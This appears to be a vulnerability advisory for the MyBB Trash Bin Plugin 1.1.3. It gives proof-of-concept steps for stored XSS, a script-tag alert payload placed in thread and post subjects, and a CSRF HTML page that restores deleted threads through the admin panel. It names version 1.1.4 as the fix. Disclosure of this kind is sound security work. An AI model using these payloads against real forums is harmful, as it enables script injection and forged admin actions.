mybb trash bin plugin 1.1.3 crosssite scripting crosssite request forgery
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
# Exploit Title: MyBB Trash Bin Plugin 1.1.3 - Cross-Site Scripting / CSRF # Date: 7/17/2018 # Author: 0xB9 # Twitter: @0xB9Sec # Contact: 0xB9[at]pm.me # Software Link: https://community.mybb.com/mods.php?action=view&pid=957 # Version: 1.1.3 # Tested on: Ubuntu 18.04 # CVE: CVE-2018-14575 1. Description: Creates a trash bin in the ACP where you can recover permanent deleted threads and posts. The thread/post subjects allow XSS and deleted posts can be restored by CSRF. 2. Proof of Concept: Cross-Site Scripting - Create a new thread with the following subject <script>alert('XSS')</script> - Permanently delete that thread - Alert is located in threads trash bin localhost/[path]/admin/index.php?module=tools-trashbin and localhost/admin/index.php?module=tools-trashbin&action=posts - Reply to a post and change the subject to the following <script>alert('XSS')</script> - Permanently delete that post - Alert is located in posts trash bin localhost/[path]/admin/index.php?module=tools-trashbin&action=posts Cross-Site Request Forgery <html> <body> <!-- Restore deleted threads & posts by thread/post ID --> <div class="popup_item_container"><a href="http://localhost/[path]/admin/index.php?module=tools-trashbin&action=threadrestore&tid=1" class="popup_item">Restore</a></div> <script type="text/javascript"> $("#thread_1").popupMenu(); </script> </body> </html> 3. Solution: Update to 1.1.4
Mybb trash bin plugin 1.1.3 crosssite scripting crosssite request forgery Vulnerability / Exploit Source : Mybb trash bin plugin 1.1.3 crosssite scripting crosssite request forgery